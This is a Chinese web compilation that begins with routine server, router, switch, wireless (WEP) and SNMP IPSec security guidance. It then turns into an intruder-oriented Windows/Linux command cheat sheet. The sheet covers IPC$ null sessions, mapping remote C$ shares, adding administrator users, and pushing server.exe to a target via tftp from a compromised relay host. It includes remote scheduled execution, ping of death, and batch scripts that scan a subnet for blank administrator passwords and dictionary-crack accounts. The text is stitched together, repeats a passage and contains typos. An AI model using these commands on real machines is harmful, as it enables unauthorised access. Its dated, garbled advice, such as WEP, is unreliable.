网络安全配置指令

㈠ 如何配置网络服务器安全

如何配置网络服务器安全
1、安装补丁程序任何操作系统都有漏洞，作为网络系统管理员就有责任及时地将“补丁”打上。大部分中小企业服务器使用的是微软的 Windows2000/2003操作系统，因为使用的人特别多，所以发现的Bug也比较多，同时，蓄意攻击它们的人也很多。微软公司为了弥补操作系统的 安全漏洞，在其网站上提供了许多补丁，可以到网上下载并安装相关升级包。对于Windows2003，至少要升级到SP1，对于Windows2000， 至少要升级至ServicePack2。
2、安装和设置防火墙现在有许多基于硬件或软件的防火墙，如华为、神州数码、联想、瑞星等厂商的 产品。对于企业内部网来说，安装防火墙是非常必要的。防火墙对于非法访问具有很好的预防作用，但是并不是安装了防火墙之后就万事大吉了，而是需要进行适当 的设置才能起作用。如果对防火墙的设置不了解，需要请技术支持人员协助设置。
3、安装网络杀毒软件现在网络上的病毒非常猖獗，这就需要在网络服务器上安装网络版的杀毒软件来控制病毒的传播，目前，大多数反病毒厂商(如瑞星、冠群金辰、趋势、赛门铁克、熊猫等)都已经推出了网络版的杀毒软件。同时，在网络版的杀毒软件使用中，必须要定期或及时升级杀毒软件。
4、账号和密码保护账号和密码保护可以说是系统的第一道防线，目前网上的大部分对系统的攻击都是从截获或猜测密码开始的。一旦黑客进入了系统，那么前面的防卫措施几乎就没有作用，所以对服务器系统管理员的账号和密码进行管理是保证系统安全非常重要的措施。
5、监测系统日志通过运行系统日志程序，系统会记录下所有用户使用系统的情形，包括最近登录时间、使用的账号、进行的活动等。日志程序会定期生成报表，通过对报表进行分析，你可以知道是否有异常现象。
6、关闭不需要的服务和端口服务器操作系统在安装的时候，会启动一些不需要的服务，这样会占用系统的资源，而且也增加了系统的安全隐患。对于假期期间完全不用的服务器，可以完全关闭;对于假期期间要使用的服务器，应关闭不需要的服务，如Telnet等。另外，还要关掉没有必要开的TCP端口。
7、定期对服务器进行备份为防止不能预料的系统故障或用户不小心的非法操作，必须对系统进行安全备份。除了对全系统进行每月一次的备份外，还应对修改过的数据进行每周一次的备份。
形，包括最近登录时间、使用的账号、进行的活动等。日志程序会定期生成报表，通过对报表进行分析，你可以知道是否有异常现象。
6、关闭不需要的服务和端口服务器操作系统在安装的时候，会启动一些不需要的服务，这样会占用系统的资源，而且也增加了系统的安全隐患。对于假期期间完全不用的服务器，可以完全关闭;对于假期期间要使用的服务器，应关闭不需要的服务，如Telnet等。另外，还要关掉没有必要开的TCP端口。
7、定期对服务器进行备份为防止不能预料的系统故障或用户不小心的非法操作，必须对系统进行安全备份。除了对全系统进行每月一次的备份外，还应对修改过的数据进行每周一次的备份。

㈡ 网络要保证安全在设备上怎样做，如路由器交换机的配置

路由器安全策略示例：

1. 路由器上不得配置用户账户。

2. 路由器上的enable password命令必须以一种安全的加密形式保存。

3. 禁止IP的直接广播。

4. 路由器应当阻止源地址为非法地址的数据包。

5. 在本单位的业务需要增长时，添加相应的访问规则。

6. 路由器应当放置在安全的位置，对其物理访问仅限于所授权的个人。

7. 每一台路由器都必须清楚地标识下面的声明：

“注意：禁止对该网络设备的非授权访问。您必须在获得明确许可的情况下才能访问或配置该设备。在此设备上执行的所有活动必须加以记录，对该策略的违反将受到纪律处分，并有可能被诉诸于法律。”

每一台网络交换机必须满足以下的配置标准：

1. 交换机上不得配置用户账户。

2. 交换机上的enable password命令必须以一种安全的加密形式保存。

3. 如果交换机的MAC水平的地址能够锁定，就应当启用此功能。

4. 如果在一个端口上出现新的或未注册的MAC地址，就应当禁用此端口。

5. 如果断开链接后又重新建立链接，就应当生成一个SNMP trap.

6. 交换机应当放置在安全的位置，对其物理访问仅限于所授权的个人。

7. 交换机应当禁用任何Web 服务器软件，如果需要这种软件来维护交换机的话，应当启动服务器来配置交换机，然后再禁用它。对管理员功能的所有访问控制都应当启用。

8. 每一台交换机都必须清楚地标识下面的声明：

“注意：禁止对该网络设备的非授权访问。您必须在获得明确许可的情况下才能访问或配置该设备。在此设备上执行的所有活动必须加以记录，对该策略的违反将受到纪律处分，并有可能被诉诸于法律。”这些安全要求未必适合你单位的情况，仅供参考。

㈢ 无线路由器如何安全设置

方法就可以了，建议你先把进入无线路由设置的网站的密码（和用户名）先改掉

WEP加密

1、启用WEP加密。
打开路由器管理界面，“无线设置”->“基本设置”:

“安全认证类型”选择“自动选择”，因为“自动选择”就是在“开放系统”和“共享密钥”之中自动协商一种，而这两种的认证方法的安全性没有什么区别。

“密钥格式选择”选择“16进制”，还有可选的是“ASCII码”，这里的设置对安全性没有任何影响，因为设置“单独密钥”的时候需要“16进制”，所以这里推荐使用“16进制”。

“密钥选择”必须填入“密钥2”的位置，这里一定要这样设置，因为新的升级程序下，密钥1必须为空，目的是为了配合单独密钥的使用(单独密钥会在下面的MAC地址过滤中介绍)，不这样设置的话可能会连接不上。密钥类型选择64/128/152位，选择了对应的位数以后“密钥类型”的长度会变更，本例中我们填入了26位参数11111111111111111111111111 。因为“密钥格式选择”为“16进制”，所以“密钥内容”可以填入字符是0、1、2、3、4、5、6、7、8、9、a、b、c、d、e、f，设置完记得保存。

如果不需要使用“单独密钥”功能，网卡只需要简单配置成加密模式，密钥格式，密钥内容要和路由器一样，密钥设置也要设置为“WEP密钥2”的位置(和路由器对应)，这时候就可以连接上路由器了。

如果你比较有兴趣学习的话，还可以继续往下看

无线路由器加密有以下几种方法:

1.使用无线路由器提供的WEP,WPA等加密方式.WEP一般设置简单.
2.或者使用访问限制,同过MAC地址来限制连接,就是说在访问限制列表里输入MAC的机器,才能连接到你的无线路由器.
3.一种更简单的,就是关闭SSID广播,就是无法搜索到你AP的SSID,你只能手工的方式自己填入正确的SSID,才能连接!上述三个方法都可以,但安全性质最好的是通过MAC地址限制访问.设置都是在无线路由器完成.
下面将对这些加密方式详细介绍下:

一、先介绍下最简单的,关闭SSID广播,这样无线用户就搜索不到你的网络标识,可以起到限制其他用户的连接.具体设置:
a、路由器方设置,在关闭SSID广播时,你最好改变下SSID广播号,如果不改动的话,以前连过你网络的用户,还可以连接;
b、客户机设置:无线网络---属性----无线配置---"使用windows配置您的无线网络"--然后点"添加"--写上你设置的SSID名称.OK后,---再点属性,要确认"自动连接到非手选网络"的勾未打上,确定就可以----让你刚刚设置的SSID号排在最上方,因为SSID广播关闭后,是你的电脑无线网卡去搜寻路由器,在最上方,可以首先访问你的无线网络,且避免连接到其他的无线网络.(备注:如果这样还是上不去网的话,你可以点开无线网络的TCP／IP设置,写上内网的固定 ip,网关,DNS.一般网关,DNS都是你路由器的ip.)
二、MAC地址限制

2、单独密钥的使用。

这里的MAC地址过滤可以指定某些MAC地址可以访问本无线网络而其他的不可以，“单独密钥”功能可以为单个MAC指定一个单独的密钥，这个密钥就只有带这个MAC地址的网卡可以用，其他网卡不能用，增加了一定的安全性。

打开“无线设置”->“MAC地址过滤”，在“MAC地址过滤”页面“添加新条目”，如下界面是填入参数的界面:

“MAC地址”参数我们填入的是本例中TL-WN620G的MAC地址00-0A-EB-88-65-06 ，

“类型”可以选择“允许”/“禁止”/“64位密钥”/“128位密钥”/“152位密钥” ，本例中选择了64位密钥。“允许”和“禁止”只是简单允许或禁止某一个MAC地址的通过，这和之前的MAC地址功能是一样的，这里不作为重点。

“密钥”填入了10位AAAAAAAAAA ，这里没有“密钥格式选择”，只支持“16进制”的输入。

“状态”选择生效。

最后点击保存即可，保存后会返回上一级界面：
注意到上面的“MAC地址过滤功能”的状态是“已开启”，如果是“已关闭”，右边的按钮会变成“开启过滤”，点击这个按钮来开启这一功能。至此，无线路由器这一端配置完成!

顺便说一下怎样获取网卡MAC地址?可以参考我司网站“网络教室” 文档《路由器配置指南》相关内容，通过电脑DOS界面运行ipconfig/all这个命令会弹出如下类似信息，红线勾勒部分“Physical Address”对应的就是处于连接状态的网卡的MAC地址;

二、网卡TL-WN620G的配置

打开TL-WN620G客户端应用程序主界面——“用户文件管理”—>“修改”，会弹出用户配置文件管理对话框。首先是“常规”页填入和无线路由器端相同的SSID —— 本例为“TP-LINK”

然后点击“高级”页，红线勾勒部分注意选择认证模式，可以保持和无线路由器端相同，由于我们的路由器上选择了“自动选择”模式，所以这里无论选择什么模式都是可以连接的。

如果这个选项是灰色，就请先配置“安全”页面的参数，回过头再来这里配置;

接下来我们进入“安全”页

先选择“预共享密钥(静态WEP)”，然后点击“配置…..”按钮，进入设置共享密钥的界面:

上面用红线勾勒的参数说明一下:

1)、“密钥格式”必须选择“十六进制(0-9，A-F);

2)、总共需要填入两个密钥，密钥1对应的是路由器 “无线配置”->“MAC地址过滤”页面下设置的单独密钥，本例为64位长度的密钥AAAAAAAAAA ;密钥2对应的是路由器“无线配置”->“基本设置”页面下设置的公共密钥，本例为128位长度的密钥:11111111111111111111111111 。

3)、最后要选中“WEP密钥1”。(注意“WEP密钥1”后面的圆点)

4)、单独密钥和公共密钥的位置是不能更改的。

配置完成，连续点击两次“取定”回到客户端应用程序主界面，我们可以看到网卡和无线路由器已经建立了连接，如下图所示:
这时候我们进入路由器“无线设置”-“主机状态”，可以看到已连接的网卡MAC地址;在“主机状态”页面，表里第一个显示的是无线路由器的MAC地址;

㈣ 如何在 Windows Server 2003 中为 SNMP 服务配置网络安全

创建筛选器列表
要创建保护 SNMP 消息的 IPSec 策略，请首先创建筛选器列表。为此，请按照下列步骤操作：
单击开始，指向管理工具，然后单击本地安全策略。
展开安全设置，右键单击“IP 安全策略，在本地计算机上”，然后单击“管理 IP 筛选器表和筛选器操作”。
单击“管理 IP 筛选器列表”选项卡，然后单击添加。
在 IP 筛选器列表对话框的名称框中键入 SNMP 消息 (161/162)，然后在描述框中键入 TCP 和 UDP 端口 161 筛选器。
单击以清除使用“添加向导”复选框，然后单击添加。
在出现的 IP 筛选器属性对话框的地址选项卡上，在“源地址”框中单击“任何 IP 地址”。在“目标地址”框中单击我的 IP 地址。单击以选中“镜像。同时与源地址和目标地址正好相反的数据包相匹配”复选框。
单击协议选项卡。在“选择协议类型”框中，单击 UDP。在“设置 IP 协议端口”框中，单击“从此端口”，然后在框中键入 161。单击“到此端口”，然后在框中键入 161。
单击确定。
在 IP 筛选器列表对话框中，单击添加。
在出现的 IP 筛选器属性对话框的地址选项卡上，在“源地址”框中单击“任何 IP 地址”。在“目标地址”框中单击我的 IP 地址。单击以选中“镜像。同时与源地址和目标地址正好相反的数据包相匹配”复选框。
单击协议选项卡。在“选择协议类型”框中，单击 TCP。在“设置 IP 协议”框中，单击“从此端口”，然后在框中键入 161。单击“到此端口”，然后在框中键入 161。
单击确定。
在 IP 筛选器列表对话框中，单击添加。
在出现的 IP 筛选器属性对话框的地址选项卡上，在“源地址”框中单击“任何 IP 地址”。在“目标地址”框中单击我的 IP 地址。单击以选中“镜像。同时与源地址和目标地址正好相反的数据包相匹配”复选框。
单击协议选项卡。在“选择协议类型”框中，单击 UDP。在“设置 IP 协议”框中，单击“从此端口”，然后在框中键入 162。单击“到此端口”，然后在框中键入 162。
单击确定。
在 IP 筛选器列表对话框中，单击添加。
在出现的 IP 筛选器属性对话框的地址选项卡上，在“源地址”框中单击“任何 IP 地址”。在“目标地址”框中单击我的 IP 地址。单击以选中“镜像。同时与源地址和目标地址正好相反的数据包相匹配”复选框。
单击协议选项卡。在“选择协议类型”框中，单击 TCP。在“设置 IP 协议”框中，单击“从此端口”，然后在框中键入 162。单击“到此端口”，然后在框中键入 162。
单击确定。
在 IP 筛选器列表对话框中单击确定，然后在“管理 IP 筛选器列表和筛选器操作”对话框中单击确定。
创建 IPSec 策略
要创建 IPSec 策略来对 SNMP 通信强制实施 IPSec，请按下列步骤操作：
右键单击左窗格中的“IP 安全策略，在本地计算机上”，然后单击创建 IP 安全策略。

IP 安全策略向导启动。
单击下一步。
在“IP 安全策略名称”页上的名称框中键入安全 SNMP。在描述框中，键入对 SNMP 通信强制实施 IPSec，然后单击下一步。
单击以清除“激活默认响应规则”复选框，然后单击下一步。
在“正在完成 IP 安全策略向导”页上，验证“编辑属性”复选框已被选中，然后单击完成。
在安全 SNMP 属性对话框中，单击以清除使用“添加向导”复选框，然后单击添加。
单击 IP 筛选器列表选项卡，然后单击 SNMP 消息 (161/162)。
单击筛选器操作选项卡，然后单击需要安全。
单击身份验证方法选项卡。默认的身份验证方法为 Kerberos。如果您需要备用身份验证方法，请单击添加。在新身份验证方法属性对话框中，从下面的列表中选择所需的身份验证方法，然后单击确定：
Active Directory 默认值(Kerberos V5 协议)
使用来自证书颁发机构(CA)的证书
使用此字符串(预共享密钥)
在新规则属性对话框中，单击应用，然后单击确定。
在 SNMP 属性对话框中，验证 SNMP 消息 (161/162) 复选框已被选中，然后单击确定。
在“本地安全设置”控制台的右窗格中，右键单击安全 SNMP 规则，然后单击指派。
在所有运行 SNMP 服务的基于 Windows 的计算机上完成此过程。SNMP 管理站上也必须配置此 IPSec 策略。

㈤ 配置网络访问安全策略

最简单的 访问控制列表 ACL
ACL可以限制网络流量、提高网络性能。ACL可以根据数据包的协议，指定数据包的优先级。 ACL提供对通信流量的控制手段。ACL可以限定或简化路由更新信息的长度，从而限制通过路由器某一网段的通信流量。 ACL是提供网络安全访问的基本手段。ACL允许主机A访问人力资源网络，而拒绝主机B访问。 ACL可以在路由器端口处决定哪种类型的通信流量被转发或被阻塞。例如，用户可以允许E-mail通信流量被路由，拒绝所有的Telnet通信流量
具体怎么 配置 命令 网上都有 我有教程 或者 你李霞要求 给你配好 罚你邮箱

㈥ 网络命令应用

net use \\ip\ipc$ " " /user:" " 建立IPC空链接
net use \\ip\ipc$ "密码" /user:"用户名" 建立IPC非空链接
net use h: \\ip\c$ "密码" /user:"用户名" 直接登陆后映射对方C：到本地为H:
net use h: \\ip\c$ 登陆后映射对方C：到本地为H:
net use \\ip\ipc$ /del 删除IPC链接
net use h: /del 删除映射对方到本地的为H:的映射
net user 用户名 密码 /add 建立用户
net user guest /active:yes 激活guest用户
net user 查看有哪些用户
net user 帐户名 查看帐户的属性
net localgroup administrators 用户名 /add 把“用户”添加到管理员中使其具有管理员权限,注意：administrator后加s用复数
net start 查看开启了哪些服务
net start 服务名 开启服务；(如:net start telnet， net start schele)
net stop 服务名 停止某服务
net time \\目标ip 查看对方时间
net time \\目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息
net view 查看本地局域网内开启了哪些共享
net view \\ip 查看对方局域网内开启了哪些共享
net config 显示系统网络设置
net logoff 断开连接的共享
net pause 服务名 暂停某服务
net send ip "文本信息" 向对方发信息
net ver 局域网内正在使用的网络连接类型和信息
net share 查看本地开启的共享
net share ipc$ 开启ipc$共享
net share ipc$ /del 删除ipc$共享
net share c$ /del 删除C：共享
net user guest 12345 用guest用户登陆后用将密码改为12345
net password 密码 更改系统登陆密码
netstat -a 查看开启了哪些端口,常用netstat -an
netstat -n 查看端口的网络连接情况，常用netstat -an
netstat -v 查看正在进行的工作
netstat -p 协议名 例：netstat -p tcq/ip 查看某协议使用情况（查看tcp/ip协议使用情况）
netstat -s 查看正在使用的所有协议使用情况
nbtstat -A ip 对方136到139其中一个端口开了的话，就可查看对方最近登陆的用户名（03前的为用户名）-注意：参数-A要大写
tracert -参数 ip(或计算机名) 跟踪路由（数据包），参数：“-w数字”用于设置超时间隔。
ping ip(或域名) 向对方主机发送默认大小为32字节的数据，参数：“-l[空格]数据包大小”；“-n发送数据次数”；“-t”指一直ping。
ping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping)
ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址，ipconfig可用参数“/all”显示全部配置信息
tlist -t 以树行列表显示进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内)
kill -F 进程名 加-F参数后强制结束某进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内)
del -F 文件名 加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件，/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如“DEL/AR *.*”表示删除当前目录下所有只读文件，“DEL/A-S *.*”表示删除当前目录下除系统文件以外的所有文件

#2 二：

del /S /Q 目录 或用：rmdir /s /Q 目录 /S删除目录及目录下的所有子目录和文件。同时使用参数/Q 可取消删除操作时的系统确认就直接删除。（二个命令作用相同）
move 盘符\路径\要移动的文件名 存放移动文件的路径\移动后文件名 移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖
fc one.txt two.txt > 3st.txt 对比二个文件并把不同之处输出到3st.txt文件中，"> "和"> >" 是重定向命令
at id号 开启已注册的某个计划任务
at /delete 停止所有计划任务，用参数/yes则不需要确认就直接停止
at id号 /delete 停止某个已注册的计划任务
at 查看所有的计划任务
at \\ip time 程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算机
finger username @host 查看最近有哪些用户登陆
telnet ip 端口 远和登陆服务器,默认端口为23
open ip 连接到IP（属telnet登陆后的命令）
telnet 在本机上直接键入telnet 将进入本机的telnet
路径\文件名1 路径\文件名2 /y 复制文件1到指定的目录为文件2，用参数/y就同时取消确认你要改写一份现存目录文件
c:\srv.exe \\ip\admin$ 复制本地c:\srv.exe到对方的admin下
cppy 1st.jpg/b+2st.txt/a 3st.jpg 将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件，注：2st.txt文件头要空三排，参数：/b指二进制文件，/a指ASCLL格式文件
\\ip\admin$\svv.exe c:\ 或:\\ip\admin$\*.* 复制对方admini$共享下的srv.exe文件（所有文件）至本地C：
x 要复制的文件或目录树 目标地址\目录名 复制文件和目录树，用参数/Y将不提示覆盖相同文件
tftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exe c:\server.exe 登陆后，将“IP”的server.exe下载到目标主机c:\server.exe 参数：-i指以二进制模式传送，如传送exe文件时用，如不加-i 则以ASCII模式（传送文本文件模式）进行传送
tftp -i 对方IP put c:\server.exe 登陆后，上传本地c:\server.exe至主机
ftp ip 端口 用于上传文件至服务器或进行文件操作，默认端口为21。bin指用二进制方式传送（可执行文件进）；默认为ASCII格式传送(文本文件时)
route print 显示出IP路由，将主要显示网络地址Network addres，子网掩码Netmask，网关地址Gateway addres，接口地址Interface
arp 查看和处理ARP缓存，ARP是名字解析的意思，负责把一个IP解析成一个物理性的MAC地址。arp -a将显示出全部信息
start 程序名或命令 /max 或/min 新开一个新窗口并最大化（最小化）运行某程序或命令
mem 查看cpu使用情况
attrib 文件名(目录名) 查看某文件（目录）的属性
attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存档，只读，系统，隐藏 属性；用＋则是添加为某属性
dir 查看文件，参数：/Q显示文件及目录属系统哪个用户，/T:C显示文件创建时间，/T:A显示文件上次被访问时间，/T:W上次被修改时间
date /t 、 time /t 使用此参数即“DATE/T”、“TIME/T”将只显示当前日期和时间，而不必输入新日期和时间
set 指定环境变量名称=要指派给变量的字符 设置环境变量
set 显示当前所有的环境变量
set p(或其它字符) 显示出当前以字符p(或其它字符)开头的所有环境变量
pause 暂停批处理程序，并显示出：请按任意键继续....
if 在批处理程序中执行条件处理（更多说明见if命令及变量）
goto 标签 将cmd.exe导向到批处理程序中带标签的行（标签必须单独一行，且以冒号打头，例如：“：start”标签）
call 路径\批处理文件名 从批处理程序中调用另一个批处理程序 （更多说明见call /?）
for 对一组文件中的每一个文件执行某个特定命令（更多说明见for命令及变量）
echo on或off 打开或关闭echo，仅用echo不加参数则显示当前echo设置
echo 信息 在屏幕上显示出信息
echo 信息 >> pass.txt 将"信息"保存到pass.txt文件中
findstr "Hello" aa.txt 在aa.txt文件中寻找字符串hello
find 文件名 查找某文件
title 标题名字 更改CMD窗口标题名字
color 颜色值 设置cmd控制台前景和背景颜色；0＝黑、1＝蓝、2＝绿、3＝浅绿、4＝红、5＝紫、6＝黄、7=白、8=灰、9=淡蓝、A＝淡绿、B=淡浅绿、C=淡红、D=淡紫、E=淡黄、F=亮白
prompt 名称 更改cmd.exe的显示的命令提示符(把C:\、D:\统一改为：EntSky\ )

#3 三：

ver 在DOS窗口下显示版本信息
winver 弹出一个窗口显示版本信息（内存大小、系统版本、补丁版本、计算机名）
format 盘符 /FS:类型 格式化磁盘,类型:FAT、FAT32、NTFS ,例：Format D: /FS:NTFS
md 目录名 创建目录
replace 源文件 要替换文件的目录 替换文件
ren 原文件名 新文件名 重命名文件名
tree 以树形结构显示出目录，用参数-f 将列出第个文件夹中文件名称
type 文件名 显示文本文件的内容
more 文件名 逐屏显示输出文件
doskey 要锁定的命令＝字符
doskey 要解锁命令= 为DOS提供的锁定命令(编辑命令行，重新调用win2k命令，并创建宏)。如：锁定dir命令：doskey dir=entsky (不能用doskey dir=dir)；解锁：doskey dir=
taskmgr 调出任务管理器
chkdsk /F D: 检查磁盘D并显示状态报告；加参数/f并修复磁盘上的错误
tlntadmn telnt服务admn,键入tlntadmn选择3，再选择8,就可以更改telnet服务默认端口23为其它任何端口
exit 退出cmd.exe程序或目前，用参数/B则是退出当前批处理脚本而不是cmd.exe
path 路径\可执行文件的文件名 为可执行文件设置一个路径。
cmd 启动一个win2K命令解释窗口。参数：/eff、/en 关闭、开启命令扩展；更我详细说明见cmd /?
regedit /s 注册表文件名 导入注册表；参数/S指安静模式导入，无任何提示；
regedit /e 注册表文件名 导出注册表
cacls 文件名 参数 显示或修改文件访问控制列表（ACL）--针对NTFS格式时。参数：/D 用户名:设定拒绝某用户访问；/P 用户名:perm 替换指定用户的访问权限；/G 用户名:perm 赋予指定用户访问权限；Perm 可以是: N 无，R 读取， W 写入， C 更改(写入)，F 完全控制；例：cacls D:\test.txt /D pub 设定d:\test.txt拒绝pub用户访问。
cacls 文件名 查看文件的访问用户权限列表
REM 文本内容 在批处理文件中添加注解
netsh 查看或更改本地网络配置情况

#4 四：

IIS服务命令：
iisreset /reboot 重启win2k计算机（但有提示系统将重启信息出现）
iisreset /start或stop 启动（停止）所有Internet服务
iisreset /restart 停止然后重新启动所有Internet服务
iisreset /status 显示所有Internet服务状态
iisreset /enable或disable 在本地系统上启用（禁用）Internet服务的重新启动
iisreset /rebootonerror 当启动、停止或重新启动Internet服务时，若发生错误将重新开机
iisreset /noforce 若无法停止Internet服务，将不会强制终止Internet服务
iisreset /timeout Val在到达逾时间（秒）时，仍未停止Internet服务，若指定/rebootonerror参数，则电脑将会重新开机。预设值为重新启动20秒，停止60秒，重新开机0秒。
FTP 命令： (后面有详细说明内容)
ftp的命令行格式为:
ftp －v －d －i －n －g[主机名] －v 显示远程服务器的所有响应信息。
－d 使用调试方式。
－n 限制ftp的自动登录,即不使用.netrc文件。
－g 取消全局文件名。
help [命令] 或 ？[命令] 查看命令说明
bye 或 quit 终止主机FTP进程,并退出FTP管理方式.
pwd 列出当前远端主机目录
put 或 send 本地文件名 [上传到主机上的文件名] 将本地一个文件传送至远端主机中
get 或 recv [远程主机文件名] [下载到本地后的文件名] 从远端主机中传送至本地主机中
mget [remote-files] 从远端主机接收一批文件至本地主机
mput local-files 将本地主机中一批文件传送至远端主机
dir 或 ls [remote-directory] [local-file] 列出当前远端主机目录中的文件.如果有本地文件,就将结果写至本地文件
ascii 设定以ASCII方式传送文件(缺省值)
bin 或 image 设定以二进制方式传送文件
bell 每完成一次文件传送,报警提示
cp 返回上一级目录
close 中断与远程服务器的ftp会话(与open对应)
open host[port] 建立指定ftp服务器连接,可指定连接端口
delete 删除远端主机中的文件
mdelete [remote-files] 删除一批文件
mkdir directory-name 在远端主机中建立目录
rename [from] [to] 改变远端主机中的文件名
rmdir directory-name 删除远端主机中的目录
status 显示当前FTP的状态
system 显示远端主机系统类型
user user-name [password] [account] 重新以别的用户名登录远端主机
open host [port] 重新建立一个新的连接
prompt 交互提示模式
macdef 定义宏命令
lcd 改变当前本地主机的工作目录,如果缺省,就转到当前用户的HOME目录
chmod 改变远端主机的文件权限
case 当为ON时,用MGET命令拷贝的文件名到本地机器中,全部转换为小写字母
cd remote－dir 进入远程主机目录
cp 进入远程主机目录的父目录
! 在本地机中执行交互shell，exit回到ftp环境,如!ls＊.zip

#5 五：

MYSQL 命令：
mysql -h主机地址 -u用户名 －p密码 连接MYSQL;如果刚安装好MYSQL，超级用户root是没有密码的。
（例：mysql -h110.110.110.110 -Uroot -P123456
注:u与root可以不用加空格，其它也一样）
exit 退出MYSQL
mysqladmin -u用户名 -p旧密码 password 新密码 修改密码
grant select on 数据库.* to 用户名@登录主机 identified by \"密码\"; 增加新用户。（注意：和上面不同，下面的因为是MYSQL环境中的命令，所以后面都带一个分号作为命令结束符）
show databases; 显示数据库列表。刚开始时才两个数据库：mysql和test。mysql库很重要它里面有MYSQL的系统信息，我们改密码和新增用户，实际上就是用这个库进行操作。
use mysql；
show tables; 显示库中的数据表
describe 表名; 显示数据表的结构
create database 库名; 建库
use 库名；
create table 表名 (字段设定列表)； 建表
drop database 库名;
drop table 表名； 删库和删表
delete from 表名; 将表中记录清空
select * from 表名; 显示表中的记录
mysqlmp --opt school>school.bbb 备份数据库：（命令在DOS的\\mysql\\bin目录下执行）;注释:将数据库school备份到school.bbb文件，school.bbb是一个文本文件，文件名任取，打开看看你会有新发现。
win2003系统下新增命令（实用部份）：
shutdown /参数 关闭或重启本地或远程主机。
参数说明：/S 关闭主机，/R 重启主机， /T 数字 设定延时的时间，范围0～180秒之间， /A取消开机，/M //IP 指定的远程主机。
例：shutdown /r /t 0 立即重启本地主机（无延时）
taskill /参数 进程名或进程的pid 终止一个或多个任务和进程。
参数说明：/PID 要终止进程的pid,可用tasklist命令获得各进程的pid，/IM 要终止的进程的进程名，/F 强制终止进程，/T 终止指定的进程及他所启动的子进程。
tasklist 显示当前运行在本地和远程主机上的进程、服务、服务各进程的进程标识符(PID)。
参数说明：/M 列出当前进程加载的dll文件，/SVC 显示出每个进程对应的服务，无参数时就只列出当前的进程。

#6 六：

Linux系统下基本命令： 要区分大小写
uname 显示版本信息（同win2K的 ver）
dir 显示当前目录文件,ls -al 显示包括隐藏文件（同win2K的 dir）
pwd 查询当前所在的目录位置
cd cd ..回到上一层目录，注意cd 与..之间有空格。cd /返回到根目录。
cat 文件名 查看文件内容
cat >abc.txt 往abc.txt文件中写上内容。
more 文件名 以一页一页的方式显示一个文本文件。
cp 复制文件
mv 移动文件
rm 文件名 删除文件，rm -a 目录名删除目录及子目录
mkdir 目录名 建立目录
rmdir 删除子目录，目录内没有文档。
chmod 设定档案或目录的存取权限
grep 在档案中查找字符串
diff 档案文件比较
find 档案搜寻
date 现在的日期、时间
who 查询目前和你使用同一台机器的人以及Login时间地点
w 查询目前上机者的详细资料
whoami 查看自己的帐号名称
groups 查看某人的Group
passwd 更改密码
history 查看自己下过的命令
ps 显示进程状态
kill 停止某进程
gcc 黑客通常用它来编译C语言写的文件
su 权限转换为指定使用者
telnet IP telnet连接对方主机（同win2K），当出现bash$时就说明连接成功。
ftp ftp连接上某服务器（同win2K）

附：批处理命令与变量

1：for命令及变量 基本格式：
FOR /参数 %variable IN (set) DO command [command_parameters] %variable:指定一个单一字母可替换的参数，如：%i ，而指定一个变量则用：%%i ，而调用变量时用：%i% ，变量是区分大小写的（%i 不等于 %I）。
批处理每次能处理的变量从%0-%9共10个，其中%0默认给批处理文件名使用，%1默认为使用此批处理时输入的的第一个值，同理：%2-%9指输入的第2-9个值；例：net use \\ip\ipc$ pass /user:user 中ip为%1,pass为%2 ,user为%3

(set):指定一个或一组文件，可使用通配符，如：(D:\user.txt)和(1 1 254)(1 -1 254),{ “(1 1 254)”第一个"1"指起始值，第二个"1"指增长量，第三个"254"指结束值，即：从1到254；“(1 -1 254)”说明：即从254到1 }

command：指定对第个文件执行的命令，如：net use命令；如要执行多个命令时，命令这间加：& 来隔开
command_parameters：为特定命令指定参数或命令行开关

IN (set)：指在(set)中取值；DO command ：指执行command

参数：/L 指用增量形式{ (set)为增量形式时 }；/F 指从文件中不断取值，直到取完为止{ (set)为文件时，如(d:\pass.txt)时 }。
用法举例：
@echo off
echo 用法格式：test.bat *.*.* > test.txt

for /L %%G in (1 1 254) do echo %1.%%G >>test.txt & net use \\%1.%%G /user:administrator | find "命令成功完成" >>test.txt
存为test.bat 说明：对指定的一个C类网段的254个IP依次试建立administrator密码为空的IPC$连接，如果成功就把该IP存在test.txt中。

/L指用增量形式（即从1-254或254-1）；输入的IP前面三位：*.*.*为批处理默认的 %1；%%G 为变量(ip的最后一位）；& 用来隔开echo 和net use 这二个命令；| 指建立了ipc$后，在结果中用find查看是否有"命令成功完成"信息；%1.%%G 为完整的IP地址；(1 1 254) 指起始值，增长量，结止值。
@echo off
echo 用法格式：ok.bat ip
FOR /F %%i IN (D:\user.dic) DO smb.exe %1 %%i D:\pass.dic 200
存为：ok.exe 说明：输入一个IP后，用字典文件d:\pass.dic来暴解d:\user.dic中的用户密码，直到文件中值取完为止。%%i为用户名；%1为输入的IP地址（默认）。

#7 七：

2：if命令及变量 基本格式：
IF [not] errorlevel 数字 命令语句 如果程序运行最后返回一个等于或大于指定数字的退出编码，指定条件为“真”。
例：IF errorlevel 0 命令 指程序执行后返回的值为0时，就值行后面的命令；IF not errorlevel 1 命令指程序执行最后返回的值不等于1，就执行后面的命令。
0 指发现并成功执行（真）；1 指没有发现、没执行（假）。
IF [not] 字符串1==字符串2 命令语句 如果指定的文本字符串匹配（即：字符串1 等于 字符串2），就执行后面的命令。
例：“if "%2%"=="4" goto start”指：如果输入的第二个变量为4时，执行后面的命令（注意：调用变量时就%变量名%并加" "）
IF [not] exist 文件名 命令语句 如果指定的文件名存在，就执行后面的命令。
例：“if not nc.exe goto end”指：如果没有发现nc.exe文件就跳到":end"标签处。
